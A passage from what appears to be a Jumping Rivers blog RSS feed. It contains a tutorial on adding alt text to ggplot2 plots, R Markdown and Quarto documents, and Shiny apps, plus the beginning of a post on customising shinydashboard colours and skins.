&lt;/p&gt;</description></item><item><title>Alt Text in R: Plots, Reports, and Shiny</title><link>https://www.jumpingrivers.com/blog/accessibility-alt-text-in-r/</link><pubDate>Thu, 23 Mar 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/accessibility-alt-text-in-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/accessibility-alt-text-in-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/accessibility-alt-text-in-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="what-is-alt-text"&gt;What is alt text?&lt;/h3&gt;
&lt;p&gt;Alt text (short for &lt;em&gt;alternative text&lt;/em&gt;) is text that describes the appearance and purpose of an image. Alt text has multiple purposes, the main one being that it aids visually impaired users to better understand your content when the alt text is read aloud by screen readers. Alt text is also used in place of an image if it fails to load, which means that users with poor internet connection are more likely to be able to engage with your content.&lt;/p&gt;
&lt;h3 id="how-do-i-write-alt-text"&gt;How do I write alt text?&lt;/h3&gt;
&lt;p&gt;There are already a lot of good resources on how to write alt text, and so that&amp;rsquo;s not the main focus of this blog post. This &lt;a href="https://medium.com/nightingale/writing-alt-text-for-data-visualization-2a218ef43f81" rel="external"&gt;Medium&lt;/a&gt; article by Amy Cesal describes a simple formula for helping you to write alt text for charts, which I&amp;rsquo;ve found really helpful. Liz Hare also recently gave a talk on alt text for R-Ladies New York, and the &lt;a href="https://lizharedogs.github.io/RLadiesNYAltText/#1" rel="external"&gt;slides&lt;/a&gt; are an excellent resource.&lt;/p&gt;
&lt;h3 id="can-i-automate-writing-alt-text"&gt;Can I automate writing alt text?&lt;/h3&gt;
&lt;p&gt;One of the often-cited arguments for using programming languages, such as R, is that they allow you to automate processes. And so you may very well be wondering &lt;em&gt;&amp;ldquo;can I use R to automate the writing of alt text?&amp;rdquo;&lt;/em&gt; Before I answer that question, let me remind you of the phrase &lt;em&gt;just because you can, doesn&amp;rsquo;t mean you should&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;The examples of automated alt text to describe plots that I&amp;rsquo;ve seen tend to describe which variables are on the x and y axes, the range of the data, the chart title, and maybe the colours in the plot. Some make attempts to describe a trend line. What&amp;rsquo;s almost always missing is the &amp;ldquo;why&amp;rdquo;. It&amp;rsquo;s very difficult to automate a description of what you&amp;rsquo;re trying to communicate to the person interpreting a plot with only a list of plot components.&lt;/p&gt;
&lt;p&gt;One R package that may be useful as a starting point for writing alt text is the &lt;a href="https://github.com/ajrgodfrey/BrailleR" rel="external"&gt;{BrailleR}&lt;/a&gt; package. It has support for generating alt text for both base R and {ggplot2} graphics, using the &lt;code&gt;VI()&lt;/code&gt; function. Since it&amp;rsquo;s still missing the &amp;ldquo;what am I supposed to be seeing&amp;rdquo; message, and it doesn&amp;rsquo;t always get it right, I&amp;rsquo;d encourage you never to rely 100% on automated alt text. It could provide a starting point for you to check, edit, and include the take-home message of your graphics.&lt;/p&gt;
&lt;p&gt;After you&amp;rsquo;ve written the alt text for your image, you need to actually add it to your document or app. If you&amp;rsquo;re directly writing HTML code, it&amp;rsquo;s usually quite straightforward - and &lt;a href="https://accessibility.psu.edu/images/imageshtml/" rel="external"&gt;this guide&lt;/a&gt; for improving accessibility with alt text gives a great overview. Today, this blog post will show you how to include alt text in your web applications and documents when you&amp;rsquo;ve built them in R.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-alt-text-in-r"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="how-do-i-add-alt-text-in-r"&gt;How do I add alt text in R?&lt;/h3&gt;
&lt;p&gt;With R, you can create static plots, documents, presentations, web applications, and many other output types - and they all need alt text! We&amp;rsquo;ll go through how you do that for the most common output types in R.&lt;/p&gt;
&lt;h4 id="ggplot2"&gt;{ggplot2}&lt;/h4&gt;
&lt;p&gt;It goes without saying that {ggplot2} is one of the most popular packages for creating plots in R. So it&amp;rsquo;s likely that you&amp;rsquo;ll be adding alt text to a plot created with {ggplot2}. Within the &lt;code&gt;labs()&lt;/code&gt; function in {ggplot2}, there&amp;rsquo;s an argument &lt;code&gt;alt&lt;/code&gt; (introduced in version 3.3.4) - and this is where you can add alt text.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(lemurs, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; name, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; n)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of lemurs&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Lemurs at Duke Lemur Center&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; alt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;A bar chart titled Lemurs at Duke Lemur Center. On the x-axis three species of lemurs are shown including the Crowned lemur, Gray mouse lemur, and Ring-tailed lemur. On the y-axis the count of the number of each species is shown. The number of lemurs ranges from just under 2500 for Crowned lemurs, to almost 12500 for Gray mouse lemurs. The number of Crowned lemurs is significantly lower than the other two species shown.&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="lemurs.png" style="width: 80%; display: block; margin-left: auto; margin-right: auto" alt="A bar chart titled Lemurs at Duke Lemur Center. On the x-axis three species of lemurs are shown including the Crowned lemur, Gray mouse lemur, and Ring-tailed lemur. On the y-axis the count of the number of each species is shown. The number of lemurs ranges from just under 2500 for Crowned lemurs, to almost 12500 for Gray mouse lemurs. The number of Crowned lemurs is significantly lower than the other two species shown." /&gt;
&lt;p&gt;If you save the plot as a variable, you can extract the alt text with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_alt_text&lt;/span&gt;(g)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;There are a couple of reasons for using the &lt;code&gt;alt&lt;/code&gt; argument in {ggplot2}:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It&amp;rsquo;s usually easier to write the alt text when you&amp;rsquo;re making the plot, rather than when you&amp;rsquo;re compiling the outputs since it&amp;rsquo;s fresher in your mind.&lt;/li&gt;
&lt;li&gt;The string passed to &lt;code&gt;alt&lt;/code&gt; automatically gets passed as the image&amp;rsquo;s alt text if you use the plot in a Shiny app (more on that later&amp;hellip;)&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="quarto-and-r-markdown"&gt;Quarto and R Markdown&lt;/h4&gt;
&lt;p&gt;Both R Markdown and &lt;a href="https://quarto.org/" rel="external"&gt;Quarto&lt;/a&gt; (next generation R Markdown) allow you to create outputs in HTML format, such as documents or presentations. Although MS Word, and Adobe are starting to allow you to add alt text to word documents and PDFs, neither R Markdown or Quarto have support for this yet (although hopefully they will in the future). HTML outputs are more accessible in general, so I&amp;rsquo;d recommend HTML outputs where possible anyway.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re creating a plot within a code chunk, you can use the &lt;code&gt;fig.alt&lt;/code&gt; option in R Markdown to pass in a character string of alt text:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;``&lt;span style="color:#a5d6ff"&gt;`{r, fig.alt=&amp;#34;A bar chart titled Lemurs at Duke Lemur Center. On the x-axis three species of lemurs are shown including the Crowned lemur, Gray mouse lemur, and Ring-tailed lemur. On the y-axis the count of the number of each species is shown. The number of lemurs ranges from just under 2500 for Crowned lemurs, to almost 12500 for Gray mouse lemurs. The number of Crowned lemurs is significantly lower than the other two species shown.&amp;#34;}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;g
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;``
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and in Quarto, the idea is similar but the syntax is slightly different:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;```{r}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;#| fig.alt: &amp;#34;A bar chart titled Lemurs at Duke Lemur Center. On the x-axis three species of lemurs are shown including the Crowned lemur, Gray mouse lemur, and Ring-tailed lemur. On the y-axis the count of the number of each species is shown. The number of lemurs ranges from just under 2500 for Crowned lemurs, to almost 12500 for Gray mouse lemurs. The number of Crowned lemurs is significantly lower than the other two species shown.&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;```
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Adding alt text directly into the code chunk options has always felt slightly clunky, and so what you can do instead is store your alt text in a variable and reference it in the code block option. Alternatively, you can make good use of the &lt;code&gt;get_alt_text()&lt;/code&gt; function in {ggplot2} in your R Markdown chunk options:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;```{r, fig.alt=ggplot2::get_alt_text(g)}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;```
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In Quarto, you need to be a bit more explicit about the fact you&amp;rsquo;re calling a function, but it&amp;rsquo;s still pretty straightforward:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;```{r}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;#| fig-alt: !expr ggplot2::get_alt_text(g)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;```
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you inspect the HTML of your R Markdown / Quarto output (by right-clicking and selecting &lt;em&gt;Inspect&lt;/em&gt;, or using the Ctrl+Shift+I keyboard shortcut), you can see the alt text has been added to the image:&lt;/p&gt;
&lt;img src="inspect.png" style="width: 100%; display: block; margin-left: auto; margin-right: auto" alt="Screenshot of generated html code showing the alt text previously described added to the image tag with alt" /&gt;
&lt;p&gt;If you&amp;rsquo;re creating an output format that doesn&amp;rsquo;t allow you to add alt text, such as PDF, you should still add a description of the image somewhere. You could pass in &lt;code&gt;ggplot2::get_alt_text(g)&lt;/code&gt; to the &lt;code&gt;fig.cap&lt;/code&gt; chunk option as an alternative.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re adding an image outside of a code chunk, you can add alt text to images in Quarto using:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;![](lemur.png){fig-alt=&amp;#34;A drawing of a lemur.&amp;#34;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and replacing &lt;code&gt;fig-alt&lt;/code&gt; with &lt;code&gt;alt&lt;/code&gt; works for R Markdown.&lt;/p&gt;
&lt;h4 id="shiny"&gt;Shiny&lt;/h4&gt;
&lt;p&gt;Finally, on to adding alt text in Shiny apps! Since Shiny makes it easy to build web applications straight from R, it&amp;rsquo;s important that you know how to add alt text to Shiny apps from R. If you haven&amp;rsquo;t made your plots with {ggplot2}, haven&amp;rsquo;t added your alt text to the &lt;code&gt;alt&lt;/code&gt; argument in &lt;code&gt;labs()&lt;/code&gt;, or need your alt text to update, read on!&lt;/p&gt;
&lt;p&gt;Most plots in Shiny apps are generated within a &lt;code&gt;renderPlot()&lt;/code&gt; call, with the first argument being the code that generates the plot. &lt;code&gt;renderPlot()&lt;/code&gt; also has an &lt;code&gt;alt&lt;/code&gt; argument (added in version 1.5.1) where you can pass in a character string of alt text for your plot:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderPlot&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# code to generate plot goes here&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; alt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;alt text goes here&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;However, most plots in Shiny apps have some sort of reactivity associated with them - when a user changes an input value, the plot updates. This means that the alt text should update as well. Luckily, you can pass in a &lt;code&gt;reactive()&lt;/code&gt; to the &lt;code&gt;alt&lt;/code&gt; argument in &lt;code&gt;renderPlot()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderPlot&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# code to generate plot goes here&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; alt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactive&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# code to add alt text goes here&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This means you can pass in different strings of alt text depending on which input values a user has selected. Depending on what the plot contains and what the user inputs do, you could construct the alt text based on the inputs. Even better, create a look-up table that returns human-written alt text based on a combination of input variables.&lt;/p&gt;
&lt;p&gt;If you want to read more about accessibility in Shiny then check out our previous &lt;a href="https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/" rel="external"&gt;blog post&lt;/a&gt; on the topic.&lt;/p&gt;
&lt;p&gt;I hope this blog post has convinced you that writing alt text is worthwhile, and not too tricky to add into your R developed documents and apps!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/accessibility-alt-text-in-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>How to customise the style of your {shinydashboard} Shiny app</title><link>https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/</link><pubDate>Thu, 16 Mar 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Using {shinydashboard} is great for creating dashboard prototypes with a
header-sidebar-body layout. You can quickly mock up a professional
looking dashboard containing a variety of outputs, including plots and
tables.&lt;/p&gt;
&lt;p&gt;However, after a while, you’ll probably have had enough of the “50
shades of blue” default theme. Or, you might have been asked to to
follow company branding guidelines, so you need to replace the default
colours with custom ones.&lt;/p&gt;
&lt;p&gt;This blog will take you through three different options when customising
a {shinydashboard}. First, we’ll look at using the colour and theme
options available in the package. Then, we’ll show you how to use the
{fresh} package to be able to use completely custom colour palettes.
Finally, we will look at using custom CSS to give you even more control
of the overall style of your dashboard.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-r-shiny-customising-shinydashboard"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="the-shinydashboard-package"&gt;The {shinydashboard} package&lt;/h3&gt;
&lt;p&gt;Before we get started with styling our dashboard, let’s do a quick
refresher of what {shinydashboard} is and how to use it.
{shinydashboard} is a package which provides a simple dashboard layout
consisting of a header, sidebar, and body. The code below creates an
empty dashboard, using the main layout functions from {shinydashboard}:
&lt;code&gt;dashboardHeader()&lt;/code&gt;, &lt;code&gt;dashboardSidebar()&lt;/code&gt;, and &lt;code&gt;dashboardBody()&lt;/code&gt;, all
wrapped inside of &lt;code&gt;dashboardPage()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shinydashboard&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardHeader&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardSidebar&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="An empty shiny dashboard." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/shinydashboard.png" width="1310"&gt;&lt;/p&gt;
&lt;p&gt;The package is really good at this basic type of layout, and includes
ways to enhance it — for example by adding tabs to your app using the
&lt;code&gt;menuItem()&lt;/code&gt; function, as well as the addition of the &lt;code&gt;box()&lt;/code&gt;,
&lt;code&gt;infoBox()&lt;/code&gt;, and &lt;code&gt;valueBox()&lt;/code&gt; functions, offering ways of storing
outputs in different kinds of containers.&lt;/p&gt;
&lt;p&gt;Sticking to quite a rigid layout is what makes {shinydashboard} so
great - you don’t have to fiddle around with adjusting the width and
height of divs, deciding if you want a sidebar and which side the
sidebar should be on etc. Instead, you can just use the default layout
which is enough for most dashboards.&lt;/p&gt;
&lt;p&gt;However, this rigidity is also the main weakness of {shinydashboard}. If
you want to move beyond the basic layout, it may require hacky solutions
and can sometimes be downright impossible.&lt;/p&gt;
&lt;p&gt;Despite this, it &lt;em&gt;is&lt;/em&gt; possible to customise {shinydashboard} using
built-in functions and arguments. Let’s take a look at how using an
example dashboard which displays and compares some summary statistics
for rental properties in the Bay Area of California, US. All code used
in this blog post can be found &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/" rel="external"&gt;on our
GitHub&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="using-built-in-colours-and-skins"&gt;Using built-in colours and skins&lt;/h3&gt;
&lt;p&gt;Our example app currently uses the {shinydashboard} default colours. The
only styling I have done is set the fill colour of my bar chart to match
the colour of the value boxes.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Example app without styling. Dashboard of rental property prices with\ngrey and light blue colouring." height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/no_style.png" width="1818"&gt;&lt;/p&gt;
&lt;p&gt;The first thing we can customise is the dashboard “skin”, which is the
colour of the dashboard header at the top of the app. The &lt;code&gt;skin&lt;/code&gt;
argument in &lt;code&gt;dashboardPage()&lt;/code&gt; can be one of “blue” (the default),
“black”, “purple”, “green”, “red”, or “yellow”. We will set the skin to
be “purple”:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; skin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which gives us&lt;/p&gt;
&lt;p&gt;&lt;img alt="Colouring dashboard header with skin argument. Text says “Bay Area\nRent Prices” on a purple background." height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/purple_skin.png" width="797"&gt;&lt;/p&gt;
&lt;p&gt;The other main thing we might want to change the colour of is the value
boxes. There is a &lt;code&gt;color&lt;/code&gt; argument in the &lt;code&gt;valueBox()&lt;/code&gt; function, which
has slightly more colour choices than for the skin (15 instead of 6).
Luckily, there is a purple in the list of valid colours. For all 6 of
the value boxes in the app, we will need to add &lt;code&gt;color = &amp;quot;purple&amp;quot;&lt;/code&gt; as an
argument:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;valueBox&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which gives us:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Using the built-in colours and skins in {shinydashboard}, the\ncolouring is now purple and grey." height="auto" id="h-rh-i-3" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/built_in.png" width="1827"&gt;&lt;/p&gt;
&lt;h3 id="using-the-fresh-package"&gt;Using the {fresh} package&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://github.com/dreamRs/fresh" rel="external"&gt;{fresh}&lt;/a&gt; package is an add-on
package which helps you style your {shiny} apps, including apps built
with {shinydashboard}.&lt;/p&gt;
&lt;p&gt;{shinydashboard} is built using
&lt;a href="https://github.com/ColorlibHQ/AdminLTE" rel="external"&gt;AdminLTE&lt;/a&gt;, an open source
dashboard and control panel theme built on top of Bootstrap. Therefore,
functions in {fresh} used to customise {shinydashboard} themes follow
